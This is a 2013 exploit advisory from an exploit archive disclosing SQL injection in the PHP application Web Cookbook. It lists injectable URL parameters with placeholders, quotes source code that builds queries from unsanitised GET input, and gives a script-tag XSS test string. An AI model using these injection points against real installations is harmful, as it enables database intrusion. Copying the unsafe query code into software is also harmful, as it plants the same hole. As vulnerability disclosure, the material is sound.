Web Cookbook - Multiple SQL Injection Vulnerabilities

2013-03-13T00:00:00
ID 1337DAY-ID-20501
Type zdt
Reporter Saadat Ullah
Modified 2013-03-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , [email protected]
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
 
# SQL Injection
 
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
 
 
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
    initDB();
    echo "<div class=\"rdisplay\">\n";
    $query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
    $result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
    $title = $_GET['title'];
    $prefix = $_GET['prefix'];
    $preparation = $_GET['preparation'];
    $postfix = $_GET['postfix'];
    $tipp = $_GET['tipp'];
    $ingredient = $_GET['ingredient'];
    .
    .
    .
    if ($title != "") {
        $sstring = "a.title LIKE '%$title%' ";
    }
    .
    .
    searchRecipe($mode, $sstring);
    .
    .
    In Function SearchRecipe
                $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
 
 
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
        if ($sstring != "") {
            searchRecipe(0, $sstring);
.
.
.
    $query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
 
 
A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
 
 
#Independent Pakistani Security Researcher

#  0day.today [2018-01-03]  #